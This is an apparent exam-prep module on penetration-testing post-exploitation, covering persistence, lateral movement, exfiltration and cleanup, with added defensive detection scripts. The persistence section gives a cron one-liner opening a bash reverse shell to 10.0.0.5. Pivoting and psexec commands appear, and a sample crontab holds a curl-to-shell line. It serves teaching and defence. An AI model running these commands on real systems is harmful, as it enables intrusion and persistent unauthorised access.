Post-exploitation and Lateral Movement is 14% of the CompTIA PenTest+ (PT0-003) exam. This module covers what you do after the first foothold: hold access, move deeper, steal data safely, and clean up. The first shell is rarely the goal. The real value is showing how far an attacker can go from one weak point.

You take the access you earned in attacks and exploits and demonstrate real business impact. A single compromised workstation that leads to domain admin and the customer database is a far stronger finding than a list of unpatched servers.

Persistence

Persistence keeps your access alive after a reboot, a logout, or a patch. You demonstrate it so the client understands how an attacker stays in even after the initial hole is closed.

Technique                     How it persists
Scheduled tasks / cron jobs   Re-run your payload on a timer
New accounts                  A backdoor user you control
Registry keys                 Run keys that launch on Windows startup
Reverse and bind shells       Call-back or listening shells for re-entry
C2 frameworks                 Command-and-control beacons like Sliver or Cobalt Strike
Rootkits and backdoors        Deeply hidden, persistent access

You add a Linux cron job that calls back every five minutes:

(crontab -l 2>/dev/null; echo "*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.0.0.5/4444 0>&1'") | crontab -

Document every persistence mechanism you create. You remove all of them during cleanup.
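The same cron entry is what a defender, or you during cleanup verification, should be able to find on a host. The script below is an added example, not part of the original module: it parses the text that `crontab -l` returns and flags entries carrying common persistence indicators (the `/dev/tcp` redirect used above, `bash -i`, netcat with `-e`, a download piped straight into a shell, base64-decoded payloads). The sample crontab and the indicator list are constructed for the example and are assumptions to tune for a real environment.

```python
import re

# Constructed sample of what `crontab -l` returns on a Linux host (not real data)
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /bin/bash -c 'bash -i >& /dev/tcp/10.0.0.5/4444 0>&1'
@reboot /usr/local/bin/backup.sh
*/10 * * * * curl -s http://198.51.100.7/x | sh
"""

# Indicators of cron-based persistence (assumption: extend for your environment)
SUSPICIOUS = [
    (re.compile(r"/dev/tcp/"), "bash /dev/tcp reverse shell"),
    (re.compile(r"\bbash\s+-i\b"), "interactive bash with redirected I/O"),
    (re.compile(r"\b(nc|ncat|netcat)\b.*\s-e\b"), "netcat with -e"),
    (re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b"), "download piped to shell"),
    (re.compile(r"base64\s+(-d|--decode)"), "base64-decoded payload"),
]

def parse_crontab(text):
    """Return (schedule, command) pairs for every non-comment cron line."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        if line.startswith("@"):                 # @reboot, @daily and friends
            sched, _, cmd = line.partition(" ")
        else:                                    # five schedule fields, then the command
            parts = line.split(None, 5)
            if len(parts) < 6:
                continue
            sched, cmd = " ".join(parts[:5]), parts[5]
        entries.append((sched, cmd))
    return entries

def audit_crontab(text):
    """Return (schedule, command, reason) for each entry matching an indicator."""
    findings = []
    for sched, cmd in parse_crontab(text):
        for pattern, reason in SUSPICIOUS:
            if pattern.search(cmd):
                findings.append((sched, cmd, reason))
                break                            # one reason per entry is enough
    return findings

if __name__ == "__main__":
    for sched, cmd, reason in audit_crontab(SAMPLE_CRONTAB):
        print(f"[{reason}] {sched} {cmd}")
```

Run it against `crontab -l` output for every user (and the files under `/etc/cron.d`) on each host you touched; an empty result on the hosts where you planted a job is the evidence that cleanup worked.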

Lateral Movement

Lateral movement is how you spread from your first host to the rest of the network. You pivot through a compromised host to reach systems you could not touch directly, dump credentials, and discover new services across SMB, RDP, SSH, LDAP, and RPC.

You tunnel your tools through a compromised host with Proxychains and a dynamic SSH tunnel:

ssh -D 1080 user@10.0.0.5
proxychains nmap -sT -Pn 10.0.1.0/24

You execute commands across Windows hosts with Impacket’s psexec:

impacket-psexec domain/user:password@10.0.1.20

Tool           Lateral movement use
LOLBins        Built-in tools to blend in
CrackMapExec   Spray credentials across many hosts
Impacket       psexec, wmiexec, secretsdump
Netcat         Relays and simple shells
sshuttle       Transparent VPN-like pivoting over SSH
Proxychains    Route any tool through a proxy or tunnel
Metasploit     Routing, pivoting, and post modules
PsExec         Remote execution on Windows
Mimikatz       Credential reuse for pass-the-hash
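Pivoting has a network signature worth knowing from both sides: when the connect scan above runs through the dynamic SSH tunnel, every TCP connection leaves the pivot host, so one internal source suddenly reaches many hosts on SMB, RDP, SSH, LDAP, RPC or WinRM ports within seconds. The script below is an added example, not part of the original module: it reads simple flow records and flags any source that touches ten or more distinct hosts on those ports inside a one-minute window. The flow format, the port list and the thresholds are assumptions; the sample flows are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta

EPOCH = datetime(1970, 1, 1)
# Ports of the services the module names for lateral movement (assumption: extend per environment)
LATERAL_PORTS = {22, 135, 139, 389, 445, 3389, 5985, 5986}  # SSH, RPC, SMB, LDAP, RDP, WinRM

# Constructed flow records "timestamp src dst dport proto": normal traffic plus one
# host reaching SMB on 24 addresses of a /24 within a minute, the shape a connect
# scan relayed through a pivot host produces.
BENIGN_FLOWS = [
    "2024-05-01T10:00:01 10.0.1.20 10.0.1.50 445 tcp",
    "2024-05-01T10:00:05 10.0.1.20 10.0.1.50 445 tcp",
    "2024-05-01T10:00:09 10.0.1.22 10.0.1.9 3389 tcp",
    "2024-05-01T10:00:30 10.0.1.22 10.0.1.9 443 tcp",
]
SCAN_FLOWS = [f"2024-05-01T10:01:{i:02d} 10.0.0.5 10.0.1.{i} 445 tcp" for i in range(1, 25)]
SAMPLE_FLOWS = "\n".join(BENIGN_FLOWS + SCAN_FLOWS)

def parse_flows(text):
    """Parse flow lines into (timestamp, src, dst, dport, proto) tuples."""
    records = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, src, dst, dport, proto = line.split()
        records.append((datetime.fromisoformat(ts), src, dst, int(dport), proto))
    return records

def fan_out(records, window_seconds=60, min_targets=10):
    """Flag sources that reach at least min_targets distinct hosts on lateral-movement
    ports inside one fixed window. Thresholds are assumptions to tune."""
    targets = defaultdict(set)
    for ts, src, dst, dport, proto in records:
        if proto != "tcp" or dport not in LATERAL_PORTS:
            continue
        # Fixed windows anchored at the epoch, so every record lands in exactly one bucket
        bucket = int((ts - EPOCH).total_seconds()) // window_seconds * window_seconds
        targets[(src, bucket)].add(dst)
    alerts = []
    for (src, bucket), dsts in sorted(targets.items()):
        if len(dsts) >= min_targets:
            alerts.append({
                "src": src,
                "window_start": (EPOCH + timedelta(seconds=bucket)).isoformat(),
                "targets": len(dsts),
            })
    return alerts

if __name__ == "__main__":
    for alert in fan_out(parse_flows(SAMPLE_FLOWS)):
        print(alert)
```

A fixed-window count is deliberately simple; a sliding window catches scans that straddle a minute boundary, and a real deployment would read NetFlow or firewall logs rather than a text constant. If the client's monitoring never raised this during your pivot, that gap is itself a finding for the report.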

Staging and Exfiltration

Staging collects the data you want in one place, then exfiltration moves it out without tripping alarms. You demonstrate the data theft an attacker would perform, using file encryption to protect what you move and covert channels to hide it.

Covert channel   How it hides data
DNS              Encode data in DNS queries
ICMP             Smuggle data inside ping packets
HTTPS            Blend exfil traffic into normal web traffic

You also cover steganography, hiding data inside images or files, and cloud storage as a drop point. Only exfiltrate test data or approved files, never real customer records beyond what the rules of engagement allow.
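Data encoded in DNS queries has a recognisable shape in the resolver log: one domain receives many unique, long, high-entropy subdomains. The script below is an added example, not part of the original module: it profiles query names per registered domain and flags domains whose subdomains look like encoded data. The sample queries are constructed (the tunnel-shaped names are SHA-256 digests standing in for encoded chunks), the "last two labels" rule for the registered domain and all thresholds are assumptions, and a real deployment would use a public-suffix list.

```python
import hashlib
import math
from collections import Counter, defaultdict

def shannon_entropy(s):
    """Bits of entropy per character of s (0.0 for an empty string)."""
    if not s:
        return 0.0
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values())

def split_name(qname, suffix_labels=2):
    """Split a query name into (registered domain, subdomain part).
    Assumption: the registered domain is the last two labels."""
    labels = qname.rstrip(".").lower().split(".")
    domain = ".".join(labels[-suffix_labels:])
    sub = ".".join(labels[:-suffix_labels])
    return domain, sub

def profile_domains(queries):
    """Per registered domain: unique subdomains, mean length, mean entropy."""
    subs = defaultdict(set)
    for _client, qname in queries:
        domain, sub = split_name(qname)
        subs[domain].add(sub)
    profile = {}
    for domain, subset in subs.items():
        lengths = [len(s) for s in subset]
        entropies = [shannon_entropy(s.replace(".", "")) for s in subset]
        profile[domain] = {
            "unique": len(subset),
            "mean_len": sum(lengths) / len(lengths),
            "mean_entropy": sum(entropies) / len(entropies),
        }
    return profile

def flag_tunnels(queries, min_unique=5, len_threshold=40.0, entropy_threshold=3.5):
    """Return domains whose subdomains look like encoded data (thresholds are assumptions)."""
    flagged = []
    for domain, p in profile_domains(queries).items():
        if p["unique"] >= min_unique and (
            p["mean_len"] >= len_threshold or p["mean_entropy"] >= entropy_threshold
        ):
            flagged.append(domain)
    return sorted(flagged)

def encoded_name(i):
    """Constructed tunnel-shaped query name: two hex labels under t.example."""
    h = hashlib.sha256(f"chunk{i}".encode()).hexdigest()
    return f"{h[:32]}.{h[32:48]}.t.example"

# Constructed sample resolver log as (client, queried name) pairs; not real traffic
BENIGN_QUERIES = [("10.0.1.20", n) for n in
                  ("www.example.com", "mail.example.com", "cdn.example.net", "login.example.com")]
TUNNEL_QUERIES = [("10.0.1.31", encoded_name(i)) for i in range(8)]
SAMPLE_QUERIES = BENIGN_QUERIES + TUNNEL_QUERIES

if __name__ == "__main__":
    for domain, p in profile_domains(SAMPLE_QUERIES).items():
        print(f"{domain:<14} unique={p['unique']:<3} len={p['mean_len']:.1f} H={p['mean_entropy']:.2f}")
    print("flagged:", flag_tunnels(SAMPLE_QUERIES))
```

Volume matters as much as shape: a content delivery network also produces many unique subdomains, but they are short and low entropy, which is why the check requires both a unique-subdomain count and one of the two shape signals before it fires.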

Cleanup and Restoration

A professional leaves the environment as they found it. Cleanup and restoration is an ethical and contractual requirement, not an afterthought.

  • Remove every persistence mechanism you created
  • Revert configuration changes back to the original state
  • Remove tools, payloads, and scripts you uploaded
  • Preserve artifacts and logs needed for the report
  • Perform secure data destruction of any client data you collected

You keep a running log of every change you make so cleanup is complete and verifiable. A leftover backdoor account is a finding against you, and it can become a real attacker’s entry point.

Next Steps

You finished the technical phases. Fold these results into the report you planned in Engagement Management, where the attack narrative ties your foothold, lateral movement, and impact into one story for the client. Review Attacks and Exploits to strengthen your initial access skills, and return to the CompTIA PenTest+ Course to finish the path. Before exam day, read tips for passing CompTIA exams.